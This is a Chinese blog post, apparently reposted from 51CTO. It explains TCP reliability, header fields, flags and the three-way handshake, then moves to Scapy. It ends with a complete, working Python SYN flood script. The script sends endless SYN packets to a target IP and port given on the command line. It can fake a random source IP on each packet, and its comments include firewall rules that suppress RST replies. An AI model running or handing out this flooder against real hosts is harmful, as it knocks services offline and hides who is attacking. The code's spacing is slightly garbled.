面向连接意味着两个使用TCP的应用(通常是一个客户和一个服务器)在彼此交换数据之前必须先建立一个TCP连接。
在一个TCP连接中,仅有两方进行彼此通信。广播和多播不能用于TCP。
TCP通过下列方式来提供可靠性:
应用数据被分割成TCP认为最合适发送的数据块。
当TCP发出一个段后,它启动一个定时器,等待目的端确认收到这个报文段。如果不能及时收到一个确认,将重发这个报文段。
当TCP收到发自TCP连接另一端的数据,它将发送一个确认。这个确认不是立即发送,通常将推迟几分之一秒。
TCP将保持它首部和数据的检验和。
既然TCP报文段作为IP数据报来传输,而IP数据报的到达可能会失序,因此TCP报文段的到达也可能会失序,如果必要,TCP将对收到的数据进行重新排序,将收到的数据以正确的顺序交给应用层。
既然IP数据报会发生重复,TCP的接收端必须丢弃重复的数据。
TCP还能提供流量控制。TCP连接的每一方都有固定大小的缓冲空间。
TCP的接收端只允许另一端发送接收缓冲区所能接纳的数据。这将防止较快主机致使慢主机的缓冲区溢出。
TCP字节流
两个应用程序通过TCP连接交换8bit字节构成的字节流。TCP不在字节流中插入记录标识符。我们将这称为字节流服务(byte stream service)。如果一方的应用程序先传10字节,又传20字节,再传50字节,连接的另一方将无法了解发方每次发送了多少字节。收方可以分4次接收这80个字节,每次接收20字节。一端将字节流放到TCP连接上,同样的字节流将出现在TCP连接的另一端。
另外,TCP对字节流的内容不作任何解释。TCP不知道传输的数据字节流是二进制数据,还是ASCII字符、EBCDIC字符或者其他类型数据。对字节流的解释由TCP连接双方的应用层解释。
每个TCP段都包含源端和目的端的端口号,用于寻找发端和收端应用进程。这两个值加上IP首部中的源端IP地址和目的端IP地址唯一确定一个TCP连接。
一个IP地址和一个端口号也称为一个插口(socket)插口对(socketpair)(包含客户IP地址、客户端口号、服务器IP地址和服务器端口号的四元组)可唯一确定互联网络中每个TCP连接的双方。
序号用来标识从TCP发端向TCP收端发送的数据字节流,它表示在这个报文段中的序号对每个字节进行计数。序号是32bit的无序号数,序号到达2的32次方后又从0开始。SYN标志消耗一个序号。FIN标志也要占用一个序号。
确认序号应当是上次已成功收到数据字节序号加1。只有ACK标志为1时确认序号字段才有效。
发送ACK无需任何代价,因为32bit的确认序号字段和ACK标志一样,总是TCP首部的一部分。因此,我们看到一旦一个连接建立起来,这个字段总是被设置,ACK标志也总是被设置为1。
TCP为应用层提供全双工服务。这意味数据能在两个方向上独立地进行传输。因此,连接的每一端必须保持每个方向上的传输数据序号。
TCP可以表述为一个没有选择确认或否认的滑动窗口协议(滑动窗口协议用于数据传输)。我们说TCP缺少选择确认是因为TCP首部中的确认序号表示发方已成功收到字节,但还不包括确认序号所指的字节。当前还无法对数据流中选定的部分进行确认。例如,如果1-1024字节已经成功收到,下一报文段中包含序号从2049-3072的字节,收端并不能确认这个新的报文段。它所能做的就是发回一个确认序号为1025的ACK。它也无法对一个报文段进行否认。例如,如果收到包含1025-2048字节的报文段,但它的检验和错,TCP接收端所能做的就是发回一个确认序号为1025的ACK。
首部长度给出首部中32bit字段的数目。需要这个值是因为任选字段的长度是可变的。这个字段占4bit,因此TCP最多有60字节的首部。然而,没有任选字段,正常的长度是20字节。
在TCP首部中有6个标志比特。它们中的多个可同时被设置为1。
- URG 紧急指针有效
- ACK 确认序号有效
- PSH 接收方应该尽快将这个报文段交给应用层
- RST 重建连接
- SYN 同步序号用来发起一个连接
- FIN 发端完成发送任务
TCP是一个面向连接的协议。无论哪一方向另一方发送数据之前,都必须先在双方之间建立一条连接。
这种两端间连接的建立与无连接协议如UDP不同。UDP向另一端发送数据报时,无需任何预先的握手。
TCP用三次握手过程创建一个连接。在连接创建过程中,很多参数要被初始化,例如序号被初始化以保证按序传输和连接的强壮性。
一对终端同时初始化一个它们之间的连接是可能的。但通常是由一端打开一个套接字(socket)然后监听来自另一方的连接,这就是通常所指的被动打开。
服务器端被被动打开以后,用户端就能开始创建主动打开。
- 客户端通过向服务器端发送一个SYN来创建一个主动打开,作为三次握手的一部分。客户端把这段连接的序号设定为随机数A。
- 服务器端应当为一个合法的SYN回送一个SYN/ACK。ACK的确认码应为A+1,SYN/ACK包本身又有一个随机序号B。
- 最后,客户端再发送一个ACK。当服务端收到这个ACK的时候,就完成了三次握手,并进入了连接创建状态。此时包序号被设定为收到的确认号A+1,而响应则为B+1。
▼Socket TCP Server脚本样例:
Scapy可以实现的功能:
1、TCP端口扫描
2、防火墙开放端口扫描
3、模拟TCP建立与终止
4、制造TCP DOS攻击
使用随机地址随机端口发起TCP连接
#!/usr/bin/python3.4
# -*- coding=utf-8 -*-
#firewall-cmd --direct --add-rule ipv4 filter OUTPUT 1 -p tcp --tcp-flags RST RST -s 202.100.1.139 -j DROP
#firewall-cmd --direct --add-rule ipv4 filter OUTPUT 1 -p icmp -s 202.100.1.139 -j DROP
import logging
logging.getLogger( "scapy.runtime" ).setLevel(logging.ERROR) #清除报错
from scapy. all import *
def syn_dos(ip, port, random_enable = True ): #定义方法,传入目标IP地址,目标端口号,是否激活随机伪装源IP地址
if random_enable = = True : #如果激活随机伪装源IP地址
while True : #一直执行直到ctl+c停止程序
source_port = random.randint( 1024 , 65535 ) #随机产生源端口
init_sn = random.randint( 1 , 65535 * 63335 ) #随机产生初始化序列号
yi_section = random.randint( 1 , 254 ) #随机产生,第一段IP地址
er_section = random.randint( 1 , 254 ) #随机产生,第二段IP地址
san_section = random.randint( 1 , 254 ) #随机产生,第三段IP地址
si_section = random.randint( 1 , 254 ) #随机产生,第四段IP地址
source_ip = str (yi_section) + '.' + str (er_section) + '.' + str (san_section) + '.' + str (si_section) #组合四段地址
#发送SYN同步包(不必等待回应)#随机伪装源IP,随机产生源端口和初始化序列号
send(IP(src = source_ip,dst = ip) / TCP(dport = port,sport = source_port,flags = 2 ,seq = init_sn), verbose = False )
else : #如果不激活随机伪装源IP地址
while True :
source_port = random.randint( 1024 , 65535 ) #随机产生源端口
init_sn = random.randint( 1 , 65535 * 63335 ) #随机产生初始化序列号
#发送SYN同步包(不必等待回应)#随机产生源端口和初始化序列号
send(IP(dst = ip) / TCP(dport = port,sport = source_port,flags = 2 ,seq = init_sn), verbose = False )
if __name__ = = '__main__' :
import optparse #导入选项分析模块
#配置帮助
parser = optparse.OptionParser( "程序使用方法介绍: -d <目标地址> -p <目标端口> -r <1:激活(默认) 2:不激活>" )
#选项‘-d’,指定目的IP地址
parser.add_option( '-d' , dest = 'dst_ip' , type = 'string' , help = '指定目标地址' )
#选项‘-p’,指定目的端口号
parser.add_option( '-p' , dest = 'dst_port' , type = 'int' , help = '指定目标端口' )
#选项‘-r’,是否激活随机伪装源IP地址
parser.add_option( '-r' , dest = 'random' , type = 'int' , help = '是否激活随机IP' )
#分析参数,得到Options
(options, args) = parser.parse_args()
#如果没有指定目的IP,或者没有指定目的端口号,显示帮助信息给客户看!
if (options.dst_ip = = None ) or (options.dst_port = = None ):
print (parser.usage)
exit( 0 )
else : #如果客户指定了目的地址和目的端口号,为变量赋值!
destination_ip = options.dst_ip
destination_port = options.dst_port
if options.random = = 2 : #如果客户不激活随机伪装源IP地址
syn_dos(destination_ip, destination_port, random_enable = False )
else : #客户激活随机伪装源IP地址
syn_dos(destination_ip, destination_port, random_enable = True )
本文转自Grodd51CTO博客,原文链接:http://blog.51cto.com/juispan/1980688,如需转载请自行联系原作者
|
